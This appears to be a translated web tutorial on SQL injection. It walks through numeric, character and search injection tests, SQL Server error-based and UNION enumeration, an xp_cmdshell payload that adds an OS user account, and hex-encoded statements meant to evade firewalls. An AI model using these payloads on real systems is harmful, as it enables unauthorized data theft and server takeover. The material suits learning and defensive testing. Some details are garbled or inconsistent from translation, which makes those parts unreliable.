The three ways of sql injection are: 1. Numeric injection. When the input parameter is an integer, there may be a numeric injection vulnerability; 2. Character injection. When the input parameter is a string, There may be a character injection vulnerability; 3. Search injection, the search parameters are not filtered when performing data search.
The operating environment of this tutorial: Windows 7 system, mysql version 8.0, Dell G3 computer.
SQL injection attacks refer to constructing special inputs as parameters and passing them into Web applications, and most of these inputs are some combinations in SQL syntax. By executing SQL statements Then the operation required by the attacker is performed. The main reason is that the program does not carefully filter the data input by the user, causing illegal data to invade the system.
1. Numeric injection
When the input parameter is an integer, there may be a numeric injection vulnerability.
Assume that there is a URL: HTTP://www.aaa.com/test.php?id=1
You can guess the background SQL statement as:
SELECT * FROM table WHERE id=1
SQL injection point to determine numeric vulnerabilities:
① First enter a SQL statement such as single quote '
in the input box It will become:
SELECT * FROM table WHERE id=1',
does not conform to the syntax, so the statement will definitely make an error, causing the script program to be unable to obtain data from the database, thus making the original There is an exception on the page.
② Enter and 1 = 1 in the input box
The SQL statement becomes:
SELECT * FROM table WHERE id=1 and 1 = 1
The statement is correct, the execution is normal, and the returned data is no different from the original request.
③ Enter and 1 = 2 in the database
The SQL statement becomes:
SELECT * FROM table WHERE id=1 and 1 = 2
Although the syntax is correct and the statement executes normally, the logic is wrong because 1 = 2 is permanently false, so the returned data is different from the original request.
If all the above three steps are met, the program may have a numeric SQL injection vulnerability.
2. Character injection
When the input parameter is a string, a character injection vulnerability may exist. The biggest difference between numeric and character injection is that numeric types do not need to be closed with single quotes, while character types generally need to be closed with single quotes.
The most critical thing about character injection is how to close the SQL statement and comment out the redundant code.
Assume that the background SQL statement is as follows:
SELECT * FROM table WHERE username = 'admin'
The SQL injection point to determine the character type vulnerability:
① It is better to enter the single quotation mark admin' first to test the SQL statement
. It will become:
SELECT * FROM table WHERE username = 'admin''.
Page exception.
② Input: admin' and 1 = 1 --
Note: There is a single quotation mark' after admin, which is used to close the string, and finally there is a comment character--(two There is a space after the bar!!!).
The SQL statement becomes:
SELECT * FROM table WHERE username = 'admin' and 1 = 1 --
The page is displayed correctly.
③ Input: admin' and 1 = 2 --
SQL statement becomes:
SELECT * FROM table WHERE username = 'admin' and 1 = 2 --
Page error.
If the above three steps are met, character SQL injection may exist.
3. Search injection
This is a special type of injection. This type of injection mainly refers to not filtering the search parameters when performing data searches. Generally, there is "keyword=keyword" in the link address. Some are not displayed in the link address, but are submitted directly through the search box form. The prototype of the SQL statement submitted by this type of injection point is roughly: select * from table name where field like '%keyword%' If there is injection, we can construct a SQL injection statement similar to the following for blasting: select * from table Name where field like '%test%' and '%1%'='%1%'
The following are some common injection names:
POST injection : Inject the field in the POST data
Cookie injection: Inject the field in the Cookie data
Delayed injection: Inject using the database delay feature
Search injection: The injection location is the search place
base64 injection: The injected string needs to be base64 encrypted
For database injection, attackers simply use the database to obtain more data or greater permissions. The methods of utilization can be summarized into the following categories:
Query data
Read and write files
Execute command
The attacker is doing these three things for program injection, regardless of any database, but the SQL statements injected into different databases are different.
Here are the injections of three databases: Oracle 11g, MySQL 5.1 and SQL Server 2008.
SQL Server database is a very good database, it can accurately locate error information, which is a great advantage for attackers. This is a very good thing, because the attacker can extract the data he wants through the error message.
① Enumerate the current table or column
Assume that such a table exists:
Query the detailed information of the root user, SQL The statement guess is as follows:
SELECT * FROM user WHERE username = 'root' AND password = 'root'
The attacker can use SQL Server features to obtain sensitive information, enter the following in the input box Statement:
' having 1 = 1 --
The final executed SQL statement will become:
SELECT * FROM user WHERE username = 'root' AND password = 'root' HAVING 1 = 1 --
Then the SQL executor may throw an error:
The attacker can discover the current table Named user, and the field id exists.
An attacker can use this feature to continue to obtain other column names by entering the following statement:
' GROUP BY users.id HAVING 1 = 1 --
Then the SQL statement becomes For:
SELECT * FROM user WHERE username = 'root' AND password = 'root' GROUP BY users.id HAVING 1 = 1 --
Throws error:
You can see that the column name username is included. You can query recursively once until there is no error message returned, so you can use the HAVING clause to get all the column names of the current table.
Note: Each column specified by Select should appear in the Group By clause, unless an aggregate function is used for this column
②. Extract data using data type errors
The SQL Editor will throw an exception if you try to compare a string with a non-string, or convert a string to another incompatible type.
The following SQL statement:
SELECT * FROM user WHERE username = 'abc' AND password = 'abc' AND 1 > (SELECT TOP 1 username FROM users)
Executor error message:
#You can get the user name root. Because in the subquery SELECT TOP 1 username FROM users, the first queried username is returned. The return type is varchar type, and then compared with 1 of int type. The two different types of data cannot be compared and an error is reported. This resulted in a data breach.
Use this method to recursively deduce all account information:
SELECT * FROM users WHERE username = 'abc' AND password = 'abc' AND 1 > (SELECT TOP 1 username FROM users WHERE not in ('root')).
By constructing this statement, you can get the next user name; if you replace the username in the subquery with other column names, you can get the information of other columns, which will not be described here.
SQL Server provides a large number of views to facilitate obtaining metadata. You can first guess the number of columns in the table, and then use UNION to construct a SQL statement to obtain the data.
For example:
SELECT *** FROM *** WHERE id = *** UNION SELECT 1, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
If the number of columns in the current table is 2, you can use the UNION statement to obtain the current database table. How to guess the number of columns in the current table will be described later.
Some commonly used system database views:
| Database view | Description |
|---|---|
| SYS.DATABASES | All databases in SQL Server |
| SYS.SQL_LOGINS | All logins in SQL Server |
| INFORMATION_SCHEMA.TABLES | All data tables in the current user database |
| INFORMATION_SCHEMA.COLUMNS | Current user All columns in the database |
| SYS.ALL_COLUMNS | Union of all columns of user-defined objects and system objects |
| SYS .DATABASE_PRINCIPALS | Exception permissions for each permission or column in the database |
| SYS.DATABASE_FILES | Database files stored in the database |
| SYSOBJECTS | Every object created in the database (including constraints, logs, and stored procedures) |
You can use the ORDER BY statement to determine the number of columns in the current table.
For example:
① SELECT * FROM users WHERE id = 1——SQL execution is normal
②SELECT * FROM users WHERE id = 1 ORDER BY 1 (according to the first column Sorting) - SQL execution is normal
③ SELECT * FROM users WHERE id = 1 ORDER BY 2 (sorted according to the second column) - SQL execution is normal
④ SELECT * FROM users WHERE id = 1 ORDER BY 3 (sorted by the third column) - SQL executes normally
⑤ SELECT * FROM users WHERE id = 1 ORDER BY 4 (sorted by the fourth column) - SQL throws an exception:
It can be concluded that the number of columns in the current table is only 3, because an error is reported when sorting according to the 4th column. This method also works in Oracle and MySql databases.
After knowing the number of columns, the attacker usually cooperates with the UNION keyword to carry out the next attack.
The UNION keyword combines two or more query results into a single result set. Most databases support UNION queries. However, there are the following basic rules for merging two results using UNION:
The number of columns in all queries must be the same
The data types must be compatible
① Use UNION query to guess the number of columns
Not only can you use the ORDER BY method to guess the number of columns, the UNION method can also be used.
There are 5 columns in the previously assumed user table. If we use UNION to query:
SELECT * FROM users WHERE id = 1 UNION SELECT 1
The database will issue Exception:
You can query recursively until no errors occur, then you can know the number of query fields in the User table:
UNION SELECT 1,2, UNION SELECT 1,2,3
You can also change the number after SELECT to null, so that incompatible exceptions are less likely to occur.
② Union query for sensitive information
After knowing that the number of columns is 4, you can use the following statement to continue injecting:
UNION SELECT 'x', null, null, null FROM SYSOBJECT WHERE xtype='U' (Note: xtype='U' means the object type is a table)
If the data type of the first column does not match, the database will report an error, then you can query recursively until the statements are compatible . When the statement is executed normally, you can replace x with a SQL statement to query sensitive information.
SQL Server provides a lot of system functions. You can use these system functions to access the information in the SQL Server system tables without using SQL queries. statement.
For example:
SELECT suser_name(): Returns the user’s login identification name
SELECT user_name(): Based on the specified The identification number returns the database user name
SELECT db_name(): returns the database name
SELECT is_member('db_owner'): whether it is a database Role
SELECT convert(int, '5'): Data type conversion
Stored procedure (Stored Procedure) is a set of SQL "functions" used to complete specific functions in large database systems, such as executing system commands, viewing the registry, reading disk directories, etc.
The stored procedure most commonly used by attackers is "xp_cmdshell". This stored procedure allows users to execute operating system commands.
For example: If there is an injection point in http://www.aaa.org/test.aspx?id=1, then the attacker can implement a command attack:
http://www.aaa. org/test.aspx?id=1; exec xp_cmdshell 'net user test test /add'
The final executed SQL statement is as follows:
SELECT * FROM table WHERE id=1; exec xp_cmdshell 'net user test test /add'
The statement after the semicolon can create a new user with the username test and password test for the attacker on the other party's server.
Note: Not any database user can use this type of stored procedure, the user must hold CONTROL SERVER permissions.
Common dangerous stored procedures are as follows:
| Stored procedures | Description |
|---|---|
| sp_addlogin | Creates a new SQL Server login that allows users to connect to a SQL Server instance using the SQL Server identity |
| sp_dropuser | Delete the database user from the current database |
| xp_enumgroups | Provide a Microsoft Windows local group list or define a global group list in the specified Windows domain |
| xp_regread | Read the registry |
| xp_regwrite | Write the registry |
| xp_redeletevalue | Delete registry |
| xp_dirtree | Read directory |
| sp_password | Change password |
| xp_servicecontrol | Stop or activate a service |
In addition, any database requires specific permissions when using some special functions or stored procedures. Common SQL Server database roles and permissions are as follows:
| Role | Permission |
|---|---|
| bulkadmin | Can run BULK INSERT statement |
| dbcreator | Can create, change, delete and restore any database |
| diskadmin | Can manage disk files |
| processadmin | Can plant instances running in the database engine |
| securityadmin | Can manage login names and their attributes; can take advantage of GRANT, DENY, and REVOKE server-level permissions; can also take advantage of GRANT, DENY, and REVOKE database-level permissions; in addition, you can re- Set the password for the SQL Server login |
| serveradmin | You can change server-wide configuration options and shut down the server |
| setupadmin | Can add and delete linked servers, and can execute certain system stored procedures |
| sysadmin | Can perform any activity in the database engine |
SQL Server supports dynamic execution of statements, and users can submit a string to execute SQL statements.
For example: exec('SELECT username, password FROM users')
You can also define a hexadecimal SQL statement and use the exec function to execute it. Most web applications and firewalls filter single quotes. Using exec to execute hexadecimal SQL statements can break through many firewalls and anti-injection programs, such as:
declare @query varchar(888) select @query=0x73656C6563742031 exec(@query)
or:
declare/ **/@query/**/varchar(888)/**/select/**/@query=0x73656C6563742031/**/exec(@query)
Related recommendations: "mysql tutorial 》
The above is the detailed content of What are the three ways of sql injection?. For more information, please follow other related articles on the PHP Chinese website!
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
